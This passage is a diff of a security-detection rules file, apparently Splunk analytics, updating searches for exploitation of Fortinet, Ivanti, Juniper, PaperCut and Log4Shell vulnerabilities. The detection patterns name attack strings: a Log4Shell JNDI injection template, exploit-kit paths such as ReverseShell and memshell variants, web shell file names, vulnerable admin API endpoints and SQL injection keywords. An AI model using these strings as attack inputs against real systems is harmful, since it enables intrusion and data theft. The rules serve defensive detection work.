FortiNAC CVE-2022-39952", "analytic_story": [ - "Log4Shell CVE-2021-44228", - "CISA AA22-320A" + "Fortinet FortiNAC CVE-2022-39952" ], - "asset_type": "Endpoint", + "asset_type": "Network", "cis20": [ - "CIS 10" + "CIS 13" ], "kill_chain_phases": [ "Delivery", "Installation" ], - "message": "CVE-2021-44228 Log4Shell triggered for host $dest$", + "message": "Potential CVE-2022-39952 against a Fortinet NAC may be occurring against $dest$.", "mitre_attack_id": [ "T1190", "T1133" ], "nist": [ - "DE.AE" + "DE.CM" ], "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, { "name": "dest", "type": "Hostname", @@ -247170,9 +248986,9 @@ ] } ], - "risk_score": 15, - "security_domain": "threat", - "risk_severity": "low", + "risk_score": 64, + "security_domain": "network", + "risk_severity": "medium", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1190", @@ -247239,15 +249055,15 @@ } }, { - "name": "PaperCut NG Remote Web Access Attempt", - "description": "The following analytic is designed to detect potential exploitation attempts on publicly accessible PaperCut NG servers. It identifies connections from public IP addresses to the server and specifically monitors for URI paths commonly found in proof-of-concept (POC) scripts for exploiting PaperCut NG vulnerabilities. These URI paths have been observed in both Metasploit modules and standalone scripts used for attacking PaperCut NG servers. When a public IP address is detected accessing one or more of these suspicious URI paths, an alert may be generated to notify the security team of the potential threat. The team can then investigate the source IP address, the targeted PaperCut NG server, and any other relevant information to determine the nature of the activity and take appropriate actions to mitigate the risk.", - "search": "| tstats count from datamodel=Web where Web.url IN (\"/app?service=page/SetupCompleted\", \"/app\", \"/app?service=page/PrinterList\", \"/app?service=direct/1/PrinterList/selectPrinter&sp=*\", \"/app?service=direct/1/PrinterDetails/printerOptionsTab.tab\") NOT (src IN (\"10.*.*.*\",\"172.16.*.*\", \"192.168.*.*\", \"169.254.*.*\", \"127.*.*.*\", \"fc00::*\", \"fd00::*\", \"fe80::*\")) by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest Web.dest_port sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `papercut_ng_remote_web_access_attempt_filter`", + "name": "Fortinet Appliance Auth bypass", + "description": "CVE-2022-40684 is a Fortinet appliance auth bypass that is actively being exploited and a POC is released publicy. The POC adds a SSH key to the appliance. Note that the exploit can be used with any HTTP method (GET, POST, PUT, DELETE, etc). The REST API request failing is not an indication that an attacker was unsuccessful. Horizon3 was able to modify the admin SSH keys though a REST API request that reportedly failed. The collection /api/v2/ endpoints can be used to configure the system and modify the administrator user. Any logs found that meet the above conditions and also have a URL containing /api/v2/ should be cause for concern. Further investigation of any matching log entries can reveal any damage an attack has done. Additionally, an attacker may perform the following actions to further compromise a system Modify the admin SSH key to enable the attacker to login to the compromised system. \\\nAdd new local users. \\\nUpdate networking configurations to reroute traffic. \\\nDownload the system configuration. \\\nInitiate packet captures to capture other sensitive system information. Reference Horizon3.ai", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*/api/v2/cmdb/system/admin*\") Web.http_method IN (\"GET\", \"PUT\") by Web.http_user_agent, Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `fortinet_appliance_auth_bypass_filter`", "tags": { - "name": "PaperCut NG Remote Web Access Attempt", + "name": "Fortinet Appliance Auth bypass", "analytic_story": [ - "PaperCut MF NG Vulnerability" + "CVE-2022-40684 Fortinet Appliance Auth bypass" ], - "asset_type": "Web Server", + "asset_type": "Network", "cis20": [ "CIS 13" ], @@ -247255,7 +249071,7 @@ "Delivery", "Installation" ], - "message": "URIs specific to PaperCut NG have been access by a public IP against $dest$.", + "message": "Potential CVE-2022-40684 against a Fortinet appliance may be occurring against $dest$.", "mitre_attack_id": [ "T1190", "T1133" @@ -247272,10 +249088,9 @@ ] } ], - "risk_score": 63, + "risk_score": 81, "security_domain": "network", - "risk_severity": "medium", - "atomic_guid": [], + "risk_severity": "high", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1190", @@ -247342,15 +249157,14 @@ } }, { - "name": "ProxyShell ProxyNotShell Behavior Detected", - "description": "The following correlation will identify activity related to Windows Exchange being actively exploited by adversaries related to ProxyShell or ProxyNotShell. In addition, the analytic correlates post-exploitation Cobalt Strike analytic story. Common post-exploitation behavior has been seen in the wild includes adversaries running nltest, Cobalt Strike, Mimikatz and adding a new user. The correlation specifically looks for 5 distinct analyticstories to trigger. Modify or tune as needed for your organization. 5 analytics is an arbitrary number but was chosen to reduce the amount of noise but also require the 2 analytic stories or a ProxyShell and CobaltStrike to fire. Adversaries will exploit the vulnerable Exchange server, abuse SSRF, drop a web shell, utilize the PowerShell Exchange modules and begin post-exploitation.", - "search": "| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.analyticstories) as analyticstories values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count dc(All_Risk.analyticstories) as dc_analyticstories from datamodel=Risk.All_Risk where All_Risk.analyticstories IN (\"ProxyNotShell\",\"ProxyShell\") OR (All_Risk.analyticstories IN (\"ProxyNotShell\",\"ProxyShell\") AND All_Risk.analyticstories=\"Cobalt Strike\") All_Risk.risk_object_type=\"system\" by _time span=1h All_Risk.risk_object All_Risk.risk_object_type | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| where source_count >=5 | `proxyshell_proxynotshell_behavior_detected_filter`", + "name": "Hunting for Log4Shell", + "description": "The following hunting query assists with quickly assessing CVE-2021-44228, or Log4Shell, activity mapped to the Web Datamodel. This is a combination query attempting to identify, score and dashboard. Because the Log4Shell vulnerability requires the string to be in the logs, this will work to identify the activity anywhere in the HTTP headers using _raw. Modify the first line to use the same pattern matching against other log sources. Scoring is based on a simple rubric of 0-5. 5 being the best match, and less than 5 meant to identify additional patterns that will equate to a higher total score. \\\nThe first jndi match identifies the standard pattern of `{jndi:` \\\njndi_fastmatch is meant to identify any jndi in the logs. The score is set low and is meant to be the \"base\" score used later. \\\njndi_proto is a protocol match that identifies `jndi` and one of `ldap, ldaps, rmi, dns, nis, iiop, corba, nds, http, https.` \\\nall_match is a very well written regex by https://gist.github.com/Schvenn that identifies nearly all patterns of this attack behavior. \\\nenv works to identify environment variables in the header, meant to capture `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` and `env`. \\\nuri_detect is string match looking for the common uri paths currently being scanned/abused in the wild. \\\nkeywords matches on enumerated values that, like `$ctx:loginId`, that may be found in the header used by the adversary. \\\nlookup matching is meant to catch some basic obfuscation that has been identified using upper, lower and date. \\\nScoring will then occur based on any findings. The base score is meant to be 2 , created by jndi_fastmatch. Everything else is meant to increase that score. \\\nFinally, a simple table is created to show the scoring and the _raw field. Sort based on score or columns of interest.", + "search": "| from datamodel Web.Web | eval jndi=if(match(_raw, \"(\\{|%7B)[jJnNdDiI]{4}:\"),4,0) | eval jndi_fastmatch=if(match(_raw, \"[jJnNdDiI]{4}\"),2,0) | eval jndi_proto=if(match(_raw,\"(?i)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|https):\"),5,0) | eval all_match = if(match(_raw, \"(?i)(%(25){0,}20|\\s)*(%(25){0,}24|\\$)(%(25){0,}20|\\s)*(%(25){0,}7B|{)(%(25){0,}20|\\s)*(%(25){0,}(6A|4A)|J)(%(25){0,}(6E|4E)|N)(%(25){0,}(64|44)|D)(%(25){0,}(69|49)|I)(%(25){0,}20|\\s)*(%(25){0,}3A|:)[\\w\\%]+(%(25){1,}3A|:)(%(25){1,}2F|\\/)[^\\n]+\"),5,0) | eval env_var = if(match(_raw, \"env:\") OR match(_raw, \"env:AWS_ACCESS_KEY_ID\") OR match(_raw, \"env:AWS_SECRET_ACCESS_KEY\"),5,0) | eval uridetect = if(match(_raw, \"(?i)Basic\\/Command\\/Base64|Basic\\/ReverseShell|Basic\\/TomcatMemshell|Basic\\/JBossMemshell|Basic\\/WebsphereMemshell|Basic\\/SpringMemshell|Basic\\/Command|Deserialization\\/CommonsCollectionsK|Deserialization\\/CommonsBeanutils|Deserialization\\/Jre8u20\\/TomcatMemshell|Deserialization\\/CVE_2020_2555\\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass\"),4,0) | eval keywords = if(match(_raw,\"(?i)\\$\\{ctx\\:loginId\\}|\\$\\{map\\:type\\}|\\$\\{filename\\}|\\$\\{date\\:MM-dd-yyyy\\}|\\$\\{docker\\:containerId\\}|\\$\\{docker\\:containerName\\}|\\$\\{docker\\:imageName\\}|\\$\\{env\\:USER\\}|\\$\\{event\\:Marker\\}|\\$\\{mdc\\:UserId\\}|\\$\\{java\\:runtime\\}|\\$\\{java\\:vm\\}|\\$\\{java\\:os\\}|\\$\\{jndi\\:logging/context-name\\}|\\$\\{hostName\\}|\\$\\{docker\\:containerId\\}|\\$\\{k8s\\:accountName\\}|\\$\\{k8s\\:clusterName\\}|\\$\\{k8s\\:containerId\\}|\\$\\{k8s\\:containerName\\}|\\$\\{k8s\\:host\\}|\\$\\{k8s\\:labels.app\\}|\\$\\{k8s\\:labels.podTemplateHash\\}|\\$\\{k8s\\:masterUrl\\}|\\$\\{k8s\\:namespaceId\\}|\\$\\{k8s\\:namespaceName\\}|\\$\\{k8s\\:podId\\}|\\$\\{k8s\\:podIp\\}|\\$\\{k8s\\:podName\\}|\\$\\{k8s\\:imageId\\}|\\$\\{k8s\\:imageName\\}|\\$\\{log4j\\:configLocation\\}|\\$\\{log4j\\:configParentLocation\\}|\\$\\{spring\\:spring.application.name\\}|\\$\\{main\\:myString\\}|\\$\\{main\\:0\\}|\\$\\{main\\:1\\}|\\$\\{main\\:2\\}|\\$\\{main\\:3\\}|\\$\\{main\\:4\\}|\\$\\{main\\:bar\\}|\\$\\{name\\}|\\$\\{marker\\}|\\$\\{marker\\:name\\}|\\$\\{spring\\:profiles.active[0]|\\$\\{sys\\:logPath\\}|\\$\\{web\\:rootDir\\}|\\$\\{sys\\:user.name\\}\"),4,0) | eval obf = if(match(_raw, \"(\\$|%24)[^ /]*({|%7b)[^ /]*(j|%6a)[^ /]*(n|%6e)[^ /]*(d|%64)[^ /]*(i|%69)[^ /]*(:|%3a)[^ /]*(:|%3a)[^ /]*(/|%2f)\"),5,0) | eval lookups = if(match(_raw, \"(?i)({|%7b)(main|sys|k8s|spring|lower|upper|env|date|sd)\"),4,0) | addtotals fieldname=Score, jndi, jndi_proto, env_var, uridetect, all_match, jndi_fastmatch, keywords, obf, lookups | where Score > 2 | stats values(Score) by jndi, jndi_proto, env_var, uridetect, all_match, jndi_fastmatch, keywords, lookups, obf, _raw | `hunting_for_log4shell_filter`", "tags": { - "name": "ProxyShell ProxyNotShell Behavior Detected", + "name": "Hunting for Log4Shell", "analytic_story": [ - "ProxyShell", - "BlackByte Ransomware", - "ProxyNotShell" + "Log4Shell CVE-2021-44228", + "CISA AA22-320A" ], "asset_type": "Web Server", "cis20": [ @@ -247360,7 +249174,7 @@ "Delivery", "Installation" ], - "message": "ProxyShell or ProxyNotShell activity has been identified on $risk_object$.", + "message": "Hunting for Log4Shell exploitation has occurred.", "mitre_attack_id": [ "T1190", "T1133" @@ -247370,16 +249184,30 @@ ], "observable": [ { - "name": "risk_object", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] + }, + { + "name": "http_method", + "type": "Other", + "role": [ + "Other" + ] + }, + { + "name": "src", + "type": "Other", + "role": [ + "Other" + ] } ], - "risk_score": 81, + "risk_score": 40, "security_domain": "network", - "risk_severity": "high", + "risk_severity": "low", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1190", @@ -247446,26 +249274,24 @@ } }, { - "name": "Spring4Shell Payload URL Request", - "description": "The following analytic is static indicators related to CVE-2022-22963, Spring4Shell. The 3 indicators provide an amount of fidelity that source IP is attemping to exploit a web shell on the destination. The filename and cmd are arbitrary in this exploitation. Java will write a JSP to disk and a process will spawn from Java based on the cmd passed. This is indicative of typical web shell activity.", - "search": "| tstats count from datamodel=Web where Web.http_method IN (\"GET\") Web.url IN (\"*tomcatwar.jsp*\",\"*poc.jsp*\",\"*shell.jsp*\") by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spring4shell_payload_url_request_filter`", + "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35078", + "description": "The given analytic is designed to detect the exploitation of CVE-2023-35078, a vulnerability in Ivanti Endpoint Manager Mobile (EPMM) affecting versions up to 11.4. Specifically, the query searches web logs for HTTP requests to the potentially vulnerable endpoint \"/mifs/aad/api/v2/authorized/users?*\" with a successful status code of 200. This analytic is instrumental in detecting unauthorized remote access to restricted functionalities or resources within the application, a behavior worth identifying for a Security Operations Center (SOC). By monitoring specific patterns and successful access indicators, it reveals an active attempt to exploit the vulnerability, potentially leading to data theft, unauthorized modifications, or further system compromise. If successfully executed, the impact can be severe, necessitating immediate action.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"/mifs/aad/api/v2/authorized/users?*\") Web.status=200 by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35078_filter`", "tags": { - "name": "Spring4Shell Payload URL Request", + "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35078", "analytic_story": [ - "Spring4Shell CVE-2022-22965" + "Ivanti EPMM Remote Unauthenticated Access" ], "asset_type": "Web Server", "cis20": [ "CIS 13" ], "kill_chain_phases": [ - "Installation", - "Delivery" + "Delivery", + "Installation" ], - "message": "A URL was requested related to Spring4Shell POC code on $dest$ by $src$.", + "message": "Potential CVE-2023-35078 against an Ivanti EPMM appliance on $dest$.", "mitre_attack_id": [ - "T1505.003", - "T1505", "T1190", "T1133" ], @@ -247475,62 +249301,17 @@ "observable": [ { "name": "dest", - "type": "IP Address", + "type": "Hostname", "role": [ "Victim" ] - }, - { - "name": "src", - "type": "IP Address", - "role": [ - "Attacker" - ] } ], - "risk_score": 36, + "risk_score": 64, "security_domain": "network", - "risk_severity": "low", + "risk_severity": "medium", + "atomic_guid": [], "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1505.003", - "mitre_attack_technique": "Web Shell", - "mitre_attack_tactics": [ - "Persistence" - ], - "mitre_attack_groups": [ - "APT28", - "APT29", - "APT32", - "APT38", - "APT39", - "BackdoorDiplomacy", - "Deep Panda", - "Dragonfly", - "Fox Kitten", - "GALLIUM", - "HAFNIUM", - "Kimsuky", - "Leviathan", - "Magic Hound", - "Moses Staff", - "OilRig", - "Sandworm Team", - "TEMP.Veles", - "Threat Group-3390", - "Tonto Team", - "Tropic Trooper", - "Volatile Cedar" - ] - }, - { - "mitre_attack_id": "T1505", - "mitre_attack_technique": "Server Software Component", - "mitre_attack_tactics": [ - "Persistence" - ], - "mitre_attack_groups": [] - }, { "mitre_attack_id": "T1190", "mitre_attack_technique": "Exploit Public-Facing Application", @@ -247596,24 +249377,26 @@ } }, { - "name": "SQL Injection with Long URLs", - "description": "This search looks for long URLs that have several SQL commands visible within them.", - "search": "| tstats `security_content_summariesonly` count from datamodel=Web where Web.dest_category=web_server AND (Web.url_length > 1024 OR Web.http_user_agent_length > 200) by Web.src Web.dest Web.url Web.url_length Web.http_user_agent | `drop_dm_object_name(\"Web\")` | eval url=lower(url) | eval num_sql_cmds=mvcount(split(url, \"alter%20table\")) + mvcount(split(url, \"between\")) + mvcount(split(url, \"create%20table\")) + mvcount(split(url, \"create%20database\")) + mvcount(split(url, \"create%20index\")) + mvcount(split(url, \"create%20view\")) + mvcount(split(url, \"delete\")) + mvcount(split(url, \"drop%20database\")) + mvcount(split(url, \"drop%20index\")) + mvcount(split(url, \"drop%20table\")) + mvcount(split(url, \"exists\")) + mvcount(split(url, \"exec\")) + mvcount(split(url, \"group%20by\")) + mvcount(split(url, \"having\")) + mvcount(split(url, \"insert%20into\")) + mvcount(split(url, \"inner%20join\")) + mvcount(split(url, \"left%20join\")) + mvcount(split(url, \"right%20join\")) + mvcount(split(url, \"full%20join\")) + mvcount(split(url, \"select\")) + mvcount(split(url, \"distinct\")) + mvcount(split(url, \"select%20top\")) + mvcount(split(url, \"union\")) + mvcount(split(url, \"xp_cmdshell\")) - 24 | where num_sql_cmds > 3 | `sql_injection_with_long_urls_filter`", + "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35082", + "description": "The following analytic detects potential unauthorized access attempts exploiting CVE-2023-35082 within Ivantis software products. Initially assessed to affect only MobileIron Core versions up to 11.2, further insights revealed its influence extending to Ivanti Endpoint Manager Mobile (EPMM) versions 11.10, 11.9, 11.8, and MobileIron Core 11.7 and below. The vulnerability facilitates unauthorized API access via the specific URI path /mifs/asfV3/api/v2/. The analytic identifies this behavior by monitoring web access logs for this URI pattern coupled with a HTTP 200 response code, signifying successful unauthorized access. \\ Such behavior is imperative for a Security Operations Center (SOC) to recognize, as it highlights potential security breaches which, if not addressed, could lead to unauthorized data access, system modifications, or further exploitation. In the event of a true positive, the implications are severe: an attacker might have gained unbridled access to sensitive organizational data or could modify systems maliciously. Be vigilant of potential false positives; benign activities might occasionally match the pattern. During triage, closely scrutinize the source of the access request and its subsequent actions. This analytic aids analysts in early threat detection, allowing for proactive risk mitigation.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"/mifs/asfV3/api/v2/*\") Web.status=200 by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35082_filter`", "tags": { - "name": "SQL Injection with Long URLs", + "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35082", "analytic_story": [ - "SQL Injection" + "Ivanti EPMM Remote Unauthenticated Access" ], - "asset_type": "Database Server", + "asset_type": "Web Server", "cis20": [ "CIS 13" ], "kill_chain_phases": [ - "Delivery" + "Delivery", + "Installation" ], - "message": "SQL injection attempt with url $url$ detected on $dest$", + "message": "Potential CVE-2023-35082 against an Ivanti EPMM appliance on $dest$.", "mitre_attack_id": [ - "T1190" + "T1190", + "T1133" ], "nist": [ "DE.CM" @@ -247621,15 +249404,959 @@ "observable": [ { "name": "dest", - "type": "Endpoint", + "type": "Hostname", "role": [ "Victim" ] } ], - "risk_score": 25, + "risk_score": 64, "security_domain": "network", - "risk_severity": "low", + "risk_severity": "medium", + "atomic_guid": [], + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1133", + "mitre_attack_technique": "External Remote Services", + "mitre_attack_tactics": [ + "Initial Access", + "Persistence" + ], + "mitre_attack_groups": [ + "APT18", + "APT28", + "APT29", + "APT41", + "Chimera", + "Dragonfly", + "FIN5", + "GALLIUM", + "GOLD SOUTHFIELD", + "Ke3chang", + "Kimsuky", + "LAPSUS$", + "Leviathan", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "Ivanti Sentry Authentication Bypass", + "description": "This analytic is designed to detect unauthenticated access to the System Manager Portal in Ivanti Sentry, formerly known as MobileIron Sentry. The vulnerability, designated as CVE-2023-38035, affects all supported versions 9.18, 9.17, and 9.16, as well as older versions. The analytic works by monitoring for changes in the configuration of Sentry and the underlying operating system. Such changes could indicate an attacker attempting to execute OS commands as root. This behavior is of significant concern for a Security Operations Center (SOC) as it presents a substantial security risk, particularly if port 8443, the default port for the System Manager Portal, is exposed to the internet. If the analytic returns a true positive, it suggests that an attacker has gained unauthorized access to the Sentry system, potentially leading to a significant system compromise and data breach. It is important to note that while the issue has a high CVSS score, the risk of exploitation is low for customers who do not expose port 8443 to the internet. The search specifically looks for HTTP requests to certain endpoints (\"/mics/services/configservice/*\", \"/mics/services/*\",\"/mics/services/MICSLogService*\") and HTTP status code of 200. Unusual or unexpected patterns in these parameters could indicate an attack.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"/mics/services/configservice/*\", \"/mics/services/*\",\"/mics/services/MICSLogService*\") Web.status=200 by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ivanti_sentry_authentication_bypass_filter`", + "tags": { + "name": "Ivanti Sentry Authentication Bypass", + "analytic_story": [ + "Ivanti Sentry Authentication Bypass CVE-2023-38035" + ], + "asset_type": "Network", + "cis20": [ + "CIS 13" + ], + "kill_chain_phases": [ + "Delivery" + ], + "message": "Possible exploitation of CVE-2023-38035 against $dest$.", + "mitre_attack_id": [ + "T1190" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "src", + "type": "IP Address", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 45, + "security_domain": "network", + "risk_severity": "low", + "atomic_guid": [], + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + } + ] + } + }, + { + "name": "Juniper Networks Remote Code Execution Exploit Detection", + "description": "The following analytic detects the exploitation of a remote code execution vulnerability in Juniper Networks devices. The vulnerability involves multiple steps, including uploading a malicious PHP file and an INI file to the target server, and then executing the PHP code by manipulating the PHP configuration via the uploaded INI file. The analytic specifically looks for requests to /webauth_operation.php?PHPRC=*, which are used to upload the files and execute the code, respectively. This behavior is worth identifying for a SOC because it indicates that an attacker is attempting to exploit the vulnerability to gain unauthorized access to the device and execute arbitrary code. If a true positive is found, it suggests that an attacker has successfully exploited the vulnerability and may have gained control over the device, leading to data theft, network compromise, or other damaging outcomes. Upon triage, review the request parameters and the response to determine if the exploitation was successful. Capture and inspect any relevant network traffic and server logs to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*/webauth_operation.php?PHPRC=*\") Web.status=200 by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `juniper_networks_remote_code_execution_exploit_detection_filter`", + "tags": { + "name": "Juniper Networks Remote Code Execution Exploit Detection", + "analytic_story": [ + "Juniper JunOS Remote Code Execution" + ], + "asset_type": "Web server", + "cis20": [ + "CIS 13" + ], + "kill_chain_phases": [ + "Delivery", + "Command And Control", + "Installation" + ], + "message": "This analytic has identified a potential exploitation of a remote code execution vulnerability in Juniper Networks devices on $dest$ on the URL $url$ used for the exploit.", + "mitre_attack_id": [ + "T1190", + "T1105", + "T1059" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "url", + "type": "URL String", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 72, + "security_domain": "network", + "risk_severity": "medium", + "atomic_guid": [], + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] + } + ] + } + }, + { + "name": "Log4Shell JNDI Payload Injection Attempt", + "description": "CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", + "search": "| from datamodel Web.Web | regex _raw=\"[jJnNdDiI]{4}(\\:|\\%3A|\\/|\\%2F)\\w+(\\:\\/\\/|\\%3A\\%2F\\%2F)(\\$\\{.*?\\}(\\.)?)?\" | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_attempt_filter`", + "tags": { + "name": "Log4Shell JNDI Payload Injection Attempt", + "analytic_story": [ + "Log4Shell CVE-2021-44228", + "CISA AA22-257A", + "CISA AA22-320A" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Delivery", + "Installation" + ], + "message": "CVE-2021-44228 Log4Shell triggered for host $dest$", + "mitre_attack_id": [ + "T1190", + "T1133" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 15, + "security_domain": "threat", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue 